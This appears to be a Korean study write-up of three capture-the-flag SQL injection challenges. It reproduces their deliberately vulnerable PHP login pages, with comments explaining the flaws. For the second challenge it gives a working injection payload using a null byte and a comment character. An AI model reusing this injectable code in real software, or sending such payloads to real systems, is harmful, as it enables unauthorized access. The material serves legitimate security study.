1.
<html>
<head>
<style type="text/css">
* { margin:0 auto; padding:10pt; }
input[type=submit] { width:150pt; }
</style>
<title>SQL 100</title>
</head>
<body>
<?php
// Login handler for the "SQL 100" challenge: reads id/pw from the query string
// and builds the SELECT by string interpolation. The mysql_* extension used
// here was removed in PHP 7, and the bare array keys ($_GET[id]) rely on an
// undefined constant being treated as a string, which newer PHP versions reject.
mysql_connect("localhost","","");
mysql_select_db("");
// The secret revealed to an "admin" session; "????" is the challenge's redaction.
$password=md5("????");
if($_GET[id] && $_GET[pw])
{
// injection point
// Both parameters are interpolated unescaped into the WHERE clause, so a quote
// character in either one changes the query structure. The fix is a prepared
// statement with bound parameters (mysqli/PDO), not escaping.
$query="select id,pw from user where id='$_GET[id]' and pw='$_GET[pw]'";
// mysql_query() returns false on a SQL error; that false goes straight into
// mysql_fetch_array() and surfaces only as a warning, so a malformed query is
// never detected here.
$data=mysql_fetch_array(mysql_query($query));
// Only the id column of the first returned row decides the outcome; nothing
// re-checks that the supplied pw actually belongs to that row.
if($data[id]=="guest")
{
echo("hi guest!");
}
else if($data[id]=="admin")
{
echo("hi admin!");
echo("<br>password is $password");
}
else
{
// The query text is HTML-encoded (no markup injection) but is still echoed to
// the client, which discloses the exact SQL shape to whoever is probing it.
echo("Wrong<br>".htmlspecialchars($query)."<br>");
}
echo("<br><br><a href=index.php>Done</a>");
exit();
}
?>
<!-- Credentials are submitted with GET, so the password field ends up in the
     URL, browser history, Referer headers and server access logs; a login
     form should use method="post". -->
<form method=get action=index.php>
<table border=0 align=center cellpadding=20 cellspacing=0>
<tr><td>username</td><td><input type=text name=id value='guest'></td></tr>
<tr><td>password</td><td><input type=password name=pw value='guest'></td></tr>
<tr><td colspan=2 align=center><input type=submit value='Login'></td></tr>
</table>
</form>
<!-- index.phps serves this script's source to clients (intentional for the challenge). -->
<center><a href=index.phps>index.phps</a></center>
</body>
</html>
admin으로 로그인 해서 password를 알아내는 문제
burp suite로 테스트 해보라는데 ...
뭘 알아야...
해설
2.
<html>
<head>
<style type="text/css">
* { margin:0 auto; padding:10pt; }
input[type=submit] { width:100pt; }
div { background:lightblue;text-align:center;width:300pt; }
</style>
<title>SQL 150</title>
</head>
<body>
<center>
<?php
// "SQL 150" challenge: looks up a user by a numeric `no` taken from the query
// string. Uses the mysql_* extension (removed in PHP 7) and bare array keys
// ($_GET[no]), which newer PHP versions reject.
mysql_connect("localhost","","");
mysql_select_db("");
// The secret revealed for an "admin" row; "????" is the challenge's redaction.
$password=md5("????");
if($_GET[no])
{
// Blacklist filter: rejects the request if any ASCII letter appears (eregi is
// case-insensitive and was removed in PHP 7). It does not verify that `no` is
// a number, so it is not a substitute for casting to int or binding the value
// as an integer parameter.
if(eregi("[a-z]",$_GET[no])) exit("Access Denied");
// `no` is interpolated unquoted and unescaped into a numeric comparison; with
// the filter above as the only defence the query structure is still attacker-
// controlled. A prepared statement with an integer parameter is the fix.
$query="select * from user where no=$_GET[no]";
// mysql_query() returns false on a SQL error and that false is passed straight
// to mysql_fetch_array(); failures show up only as a warning.
$data=mysql_fetch_array(mysql_query($query));
// Outcome depends solely on the user column of the first returned row.
if($data[user]=="guest") echo("hi guest");
else if($data[user]=="admin") echo("password is $password");
// Echoes the (HTML-encoded) query back to the client, disclosing its exact shape.
else echo("Wrong<br>".htmlspecialchars($query));
}
?>
</center>
<form method=get action=index.php>
<div>No <input type=text name=no value='1234'><input type=submit></div>
</form>
<!-- index.phps serves this script's source to clients (intentional for the challenge). -->
<center><a href=index.phps>index.phps</a></center>
</body>
</html>
해설
php에서 함수의 매개변수로 NULL값이 전달되었을 때, 내부적으로 문자열로 변환되는 경우가 많음
input에 1234를 입력하고 제출 버튼 클릭
/index.php?no=1234 이렇게 쿼리 스트링이 날아감
no=%27%00%27 or 1=1 order by no desc%23 이렇게 적어주면 되는데
%27%00%27 or 1=1 order by no desc%23 는 인코딩 된 형태
디코딩 하면 ↓
' NULL ' or 1=1 order by no desc #
%27 → 싱글쿼터 (')
%00 → NULL 문자 (널 바이트)
%23 → #
3.
<html>
<head>
<style type="text/css">
* { margin:0 auto; padding:10pt; }
input[type=submit] { width:100pt; }
div { background:lightblue;text-align:center;width:300pt; }
</style>
<title>SQL SPACE</title>
</head>
<body>
<center>
<?php
// "SQL SPACE" challenge: login lookup by id/pw with a space-stripping filter.
// Uses the mysql_* extension (removed in PHP 7) and bare array keys ($_GET[id]),
// which newer PHP versions reject. Note the empty host in mysql_connect().
mysql_connect("","","");
mysql_select_db("");
// Plain-text secret revealed for an "admin" row; "????" is the challenge's redaction.
$password="????";
if($_GET[id] && $_GET[pw])
{
// addslashes() is applied to pw only; id is interpolated with no escaping at
// all. addslashes() is also not charset-aware, so even for pw it is not a
// substitute for a prepared statement with bound parameters.
$_GET[pw]=addslashes($_GET[pw]);
// Removing spaces is a blacklist filter on the input text; it does not change
// the fact that both values are concatenated into the SQL string below.
$_GET[id]=str_replace(" ","",$_GET[id]);
$_GET[pw]=str_replace(" ","",$_GET[pw]);
$query="select * from user where pw='$_GET[pw]' and user='$_GET[id]'";
// The statement is echoed (HTML-encoded) before it runs, so the client always
// sees the exact query being executed.
echo("<b>".htmlspecialchars($query)."</b><br>");
// mysql_query() returns false on a SQL error and that false goes straight into
// mysql_fetch_array(); failures surface only as a warning.
$data=mysql_fetch_array(mysql_query($query));
// Two independent ifs, no else: the outcome depends only on the user column of
// the first returned row, and a miss prints nothing beyond the echoed query.
if($data[user]=="guest") echo("hi guest");
if($data[user]=="admin") echo("password is $password");
}
?>
</center>
<!-- Credentials are submitted with GET, so the password field ends up in the
     URL, browser history, Referer headers and server access logs; a login
     form should use method="post". -->
<form method=get action=index.php>
<table border=0 align=center cellpadding=10>
<tr><td>ID</td><td><input type=text name=id value='guest'></td></tr>
<tr><td>PW</td><td><input type=password name=pw value='guest'></td></tr>
<tr><td colspan=2 align=center><input type=submit value='Login'></td></tr>
</table>
</form>
</body>
</html>
pw = a 인 것은 그냥 파라미터가 넘어가야해서 넣어준것